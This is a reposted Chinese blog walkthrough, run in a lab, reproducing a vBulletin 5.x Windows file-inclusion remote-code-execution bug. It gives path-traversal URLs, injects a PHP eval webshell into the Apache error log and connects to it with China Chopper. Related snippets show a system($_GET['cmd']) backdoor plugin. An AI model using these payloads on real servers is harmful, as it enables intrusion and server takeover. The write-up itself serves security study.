vBulletin 5.x 版本通杀远程代码执行漏洞复现

最新推荐文章于 2024-08-11 23:50:54 发布
最新推荐文章于 2024-08-11 23:50:54 发布
阅读量1.2k 收藏 1
点赞数
文章标签: php 运维 操作系统
原文链接:http://www.cnblogs.com/sch01ar/p/8168996.html
版权

漏洞介绍

vBulletin中存在一个文件包含问题,可使恶意访问者包含来自 vBulletin 服务器的文件并且执行任意 PHP 代码。未经验证的恶意访问者可通过向index.php发出包含 routestring=参数的GET 请求,从而触发文件包含漏洞,最终导致远程代码执行漏洞,影响版本:vBulletin v5.x

漏洞原理

index.php页面发送GET请求去使用routestring参数包含本地文件时,层层调用功能函数对routestring的值进行过滤,主要的处理代码位于/includes/vb5/frontend/routing.php文件

if  (strlen($path)  >  2  )        
    {        
        $ext = strtolower(substr($path,  -4))  ;      
        if(($ext == '.gif') OR ($ext == '.png')OR($ext == '.jpg')  OR ($ext == '.css') OR (strtolower(substr($path,-3)) == '.js'))  
        {      
          header("HTTP/1.0 404 Not Found");  
          die('');  
        }
    }

这段代码判断routestring获取的值是否以.gif, .png, .jpg, .css or .js结尾,如果是则头部信息返回404

if  (strpos($path,  '/')  ===  false)        
     {        
        $this->controller  =  'relay';      
        $this->action  =  'legacy';      
        $this->template  =  '';      
        $this->arguments  =  array($path);      
        $this->queryParameters  =  array();      
        return;      
    }

这段代码中strpos()函数返回/字符在$path中第一次出现的位置,若返回信息为false才会继续处理,也就是说路径中不能出现"/"

对于Linux服务器,处理URL时,/表示目录层的分隔、表示符,所以此处无法以多个../的方式包含网站中的其他文件。但是对于Windows服务器,/和\在表达路径时,是等价的,而程序并没有对\进行处理,所以导致本次针对Windows服务器的文件包含漏洞

实验链接:https://www.ichunqiu.com/vm/60507/1

访问链接:http://172.16.12.2/vb5/index.php?routestring=..\\

爆出了网站的绝对路径

访问网站的写有phpinfo函数的非php文件,验证包含漏洞

http://172.16.12.2/vb5/index.php?routestring=\\..\\..\\..\\..\\..\\phpstudy\\www\phpinfo.txt

成功地执行了根目录下的phpinfo.txt文件

构造链接:http://172.16.12.2/vb5/index.php<?php @eval($_POST['x']);?>

用burp抓包

这个地方被url编码了,需要改一下

发包

返回了403错误,该地址被写到了错误日志里

访问错误日志:http://172.16.12.2/vb5/index.php?routestring=\\..\\..\\..\\..\\..\\phpstudy\\apache\\logs\\error.log

php一句话木马被写到里面,用菜刀连接

连接成功

 

转载于:https://www.cnblogs.com/sch01ar/p/8168996.html

andiao1218
关注
CVE-2019-16759 vBulletin 5.x 0day pre-auth RCE漏洞复现
ranuy阮的博客
09-30 2632
1.vBulletin介绍 vBulletin 是世界上用户非常广泛的PHP论坛,很多大型论坛都选择vBulletin作为自己的社区。vBulletin高效,稳定,安全,在中国也有很多大型客户,比如蜂鸟网,51团购,海洋部落等在线上万人的论坛都用vBulletin。 vBulletin的官方网站是 http://www.vBulletin.com 它不是免费软件,但价格很低。 2.漏洞描述 vBu...
vBulletin 5.x RCE(CVE-2019-16759 )复现
玄道的网安博客
08-13 1930
环境搭建 使用docker安装 docker run -ti -p 80:80 --name vbulletin -d p8361/vbulletin-cve-2015-7808 docker exec -it e4fce6b1886c /bin/bash # update然后装vim apt-get update apt install vim # 改配置 vim /etc/apache2/apache2.conf# 最下面补这个配置 ServerName localhost:
vBulletin 5.x 前台RCE漏洞复现
cynthrial的博客
11-07 577
vBulletin 5.x 前台RCE漏洞复现vBulletin 5.x 前台RCE漏洞复现漏洞原理RCE复现参考 vBulletin 5.x 前台RCE漏洞复现 漏洞原理 本质是一个文件包含漏洞,攻击者可以通过包含文件执行任意php代码。 追踪源码分析 如果get参数传入则赋值给$path,继续追踪path变量 如果path的变量长度大于2则判断是否是gif等文件,是的话则返回404 执行前检查路径 #strpos取“/”在path中的位置,如果有/ 则函数为真,不继续执行 linux中路径只能为
渗透学习之漏洞复现
最新发布
Zombie_QP的博客
08-11 466
2)i.d在php中$_REQUEST,自动转为i_d,而 $request_uri 接收i.d就是i.d。这个代码在burp中可以这样写,但是在页面的搜索框中输入的话,要将其编码。然后咋们去进行burpsuit抓包,将抓到的包放入repeater里面。3)注入绕过 =(like) 单引号(十六进制) 空格(/**/)这里我们运用临时文件去做一个绕过,编写一个HTML文件。查看源代码后,发现有防范,那么应该如何去绕过呢?1)hpp全局污染,php接受相同参数。这里的两条限制了长度,限制了字母和数字。
unserialize() 实战之 vBulletin 5.x.x 远程代码执行
weixin_34037173的博客
03-08 446
RickGray · 2015/11/10 12:04 Author: RickGray (知道创宇404安全实验室) 近日,vBulletin 的一枚 RCE 利用和简要的分析被曝光,产生漏洞的原因源于 vBulletin 程序在处理 Ajax API 调用的时候,使用 unse...
vBulletin 论坛全版本 后台拿shell
cnbird's blog
12-20 1924
在后台,进插件管理.添加插件. Ajax_complete 填入代码:1 if(isset($_GET['cmd'])){echo "cmd"; system($_GET['cmd']);exit;} 1 if(isset($_GET['cmd'])){echo "cmd"; system($_GET['cmd']);exit;} 激活mod 访问 www.site.com/foruml
[论坛社区]vBulletin 3.x (VBB) Convertor phpBB 3.0 转换程序_vb30x_phpbb3.
03-15
[论坛社区]vBulletin 3.x (VBB) Convertor phpBB 3.0 转换程序_vb30x_phpbb3.[论坛社区]vBulletin 3.x (VBB) Convertor phpBB 3.0 转换程序_vb30x_phpbb3. 1.适合个人搭建网站项目参考 2.适合学生毕业设计搭建网站...
[论坛社区]vBulletin 3.7.0 beta5_vbulletin3.7.zip源码PHP项目源代码下载
03-15
[论坛社区]vBulletin 3.7.0 beta5_vbulletin3.7.zip源码PHP项目源代码下载[论坛社区]vBulletin 3.7.0 beta5_vbulletin3.7.zip源码PHP项目源代码下载 1.适合个人搭建网站项目参考 2.适合学生毕业设计搭建网站参考 3....
论坛程序vBulletin 5曝漏洞 可能已泄露千万用户数据
weixin_34075551的博客
08-01 337
近日,有报道指出vBulletin开发者网站遭遇黑客攻击并且泄露了将近48万vBulletin用户的敏感信息。 在遭遇黑客攻击后,vBulletin官方紧急强制性要求用户重置密码,他们警告用户:攻击者可能利用我们的系统漏洞得到了一些用户ID以及加密后的密码。随即,vBulletin官网提及了一个用于连接5.1.4版本与5.1.9版本的安全补丁。 官方未...
CVE-2019-16759 vBulletin 5.x RCE 复现
weixin_41064688的博客
08-17 485
我是使用docker复现的 环境搭建 自行搭建好docker 首先 查看防火墙状态: systemctl status firewalld.service 绿色为开启,开启时无法打开网页 执行关闭命令: systemctl stop firewalld.service 下载vBulletin 5.x RCE的docker docker run -ti -p 80:80 --name vbulletin -d p8361/vbulletin-cve-2015-7808 查看docker Contain
vBulletin4.1.5_cn
01-11
vBulletin4.1.5_cn 论坛CMS稳定版本
vBulletin nual模板
12-06
vBulletin nual模板
开源论坛程序 vBulletin 被曝严重且详情不明的漏洞,请立即修复
smellycat000的专栏
05-12 758
聚焦源代码安全,网罗国内外最新资讯!编译:奇安信代码卫士团队如果你正在运行基于vBulletin软件的在线论坛,那么应确保已安装旨在修复严重漏洞的新补丁。。vBulletin 项目...
vbulletin论坛_不同的社区论坛类型:vBulletin vs PhpBB与SMF
culu1614的博客
08-10 1092
vbulletin论坛According to Google definition and Wikipedia vBulletin(vB) is a commercial Internet forum software called vBulletin Solutions. Initially vBulletin was designed as forum script including fea...
漏洞分析 | vBulletin反序列化代码执行漏洞(CVE-2023-25135)
WangsuSecurity的博客
11-29 342
vBulletin是一个强大、灵活的商业论坛程序(非开源)。在CVE-2023-25135漏洞中,vBulletin 允许未经过验证的远程攻击者通过触发反序列化的HTTP请求执行任意代码
初识vbulletin
qq_30007773的博客
01-05 445
1.关于一些简单的变量的输入与输出 1){vb:var variable}输出数组的话就用{va:var variable.foo} 2){vb:raw variable}与{vb:var variable}类似,但是{vb:var variable}是讲HTML标签转义之后的,输出的是文本,不能使用CSS样式,但是安全 PS:普通变量的定义a)在render之前用$templater->r
vbulletin论坛_评论-vBulletin 3.0
culi4814的博客
07-31 679
vbulletin论坛vBulletin is commonly used to create interactive communities on a huge scale. This PHP-based bulletin board has been employed on some of the most well known Websites, including Linkin Park,...
vBulletin中的高危漏洞正在被用来构建僵尸网络
NOSEC2019的博客
09-26 1146
据悉,网络攻击者正在大规模利用由一个匿名者所披露的漏洞,它可让vBulletin服务器被非法接管。vBulletin是互联网上最流行的网站评论应用之一,而现在它正遭受严重的安全威胁,所有vBulletin服务器管理员应尽快安装好vBulletin开发者于周三上午发布的补丁。 周一,一位匿名人士发布了一份18行漏洞利用脚本,相当于正式对外披露这一漏洞。该漏洞可让未经身份验证的攻击者对版本5.0.0...
vb-422-forum:vbulletin 4.2.2源代码-forum source code
09-23
vb-422-forum是vBulletin 4.2.2版本的源代码,用于构建一个在线论坛平台。vBulletin是一个广泛使用的专业论坛平台,它具有强大的功能和可扩展性。 vBulletin 4.2.2源代码提供了创建论坛所需的关键组件和功能。它...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值